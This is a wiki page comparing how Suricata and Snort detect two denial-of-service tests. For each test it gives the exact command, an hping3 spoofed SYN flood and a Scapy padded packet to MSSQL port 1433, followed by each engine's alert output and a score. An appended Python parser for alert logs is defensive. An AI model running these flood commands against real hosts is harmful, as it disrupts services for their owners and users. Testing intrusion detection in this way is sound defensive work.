Suricata-vs-snort/Test-cases/Denial-of-service

From aldeid

Synthesis

Test                 Suricata   Snort
hping SYN flood      1          1
DoS against MSSQL    1          1
TOTAL                2          2

Hping SYN flood

  • Test: Hping SYN flood
  • Payload:
sudo hping3 -I wlan0 -a 192.168.2.10 -S 192.168.2.245 -p 22 --flood
  • Suricata trace:
ET SCAN Potential SSH Scan (Classification: Attempted Information Leak)
ET SCAN Potential SSH Scan OUTBOUND (Classification: Attempted Information Leak)
  • Suricata score: 1
  • Snort trace:
ET SCAN Potential SSH Scan (Classification: Attempted Information Leak)
ET SCAN Potential SSH Scan OUTBOUND (Classification: Attempted Information Leak)
  • Snort score: 1

DoS against MSSQL

  • Test: DoS against MSSQL
  • Payload:
sr1(IP(dst="192.168.100.35")/TCP(dport=1433)/"0"*1000)
  • Suricata trace:
03/10/11-08:21:37.786533 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2010935][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_DB_Connections]
03/10/11-08:21:38.359795 [**] [1:2001583:14] ET SCAN Behavioral Unusual Port 1433 traffic, Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2001583][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Netbios]
  • Suricata score: 1
  • Snort trace:
[**] [129:2:1] Data on SYN packet [**]
[Priority: 3] 
03/11-08:46:33.105534 192.168.100.37:20 -> 192.168.100.36:1433
TCP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:41
******S* Seq: 0x0  Ack: 0x0  Win: 0x2000  TcpLen: 20
  • Snort score: 1
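Added example, not part of the original page: a small Python parser for the one-line "fast" alert format shown in the Suricata trace above, run over the two alert lines quoted there plus one constructed non-alert line, with a helper that reproduces the page's per-engine 1/0 scoring for a given test target. The Alert field names and the score_test helper are assumptions of this example, not Suricata or Snort APIs.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Regex for the one-line "fast" alert format quoted in the Suricata trace above.
# The page's trace carries the protocol as a number ({6} = TCP); newer Suricata
# writes {TCP}, so both spellings are accepted. Trailing Xref fields are ignored.
FAST_RE = re.compile(
    r"^(?P<ts>\S+) \[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.+?) \[\*\*\] "
    r"(?:\[Classification: (?P<cls>[^\]]*)\] )?\[Priority: (?P<prio>\d+)\] "
    r"\{(?P<proto>[^}]+)\} (?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)"
)

# Two alert lines taken from the Suricata trace on this page (Xrefs shortened)
# plus one constructed non-alert line, so the parser can be exercised offline.
SAMPLE_LOG = """\
03/10/11-08:21:37.786533 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2010935]
03/10/11-08:21:38.359795 [**] [1:2001583:14] ET SCAN Behavioral Unusual Port 1433 traffic, Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2001583]
03/10/11-08:21:39.000000 -- engine stats line, not an alert (constructed)
"""

@dataclass
class Alert:
    ts: str
    gid: int
    sid: int
    rev: int
    msg: str
    classification: Optional[str]
    priority: int
    proto: str
    src: str
    sport: int
    dst: str
    dport: int

def parse_fast_line(line: str) -> Optional[Alert]:
    """Parse one fast.log line; return None for lines that are not alerts."""
    m = FAST_RE.match(line.strip())
    if not m:
        return None
    return Alert(m["ts"], int(m["gid"]), int(m["sid"]), int(m["rev"]), m["msg"],
                 m["cls"], int(m["prio"]), m["proto"], m["src"], int(m["sport"]),
                 m["dst"], int(m["dport"]))

def score_test(log_text: str, target: str, port: int) -> int:
    """Page-style score: 1 if any alert hits the test target host:port, else 0."""
    hits = [a for a in map(parse_fast_line, log_text.splitlines())
            if a and a.dst == target and a.dport == port]
    return 1 if hits else 0
```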
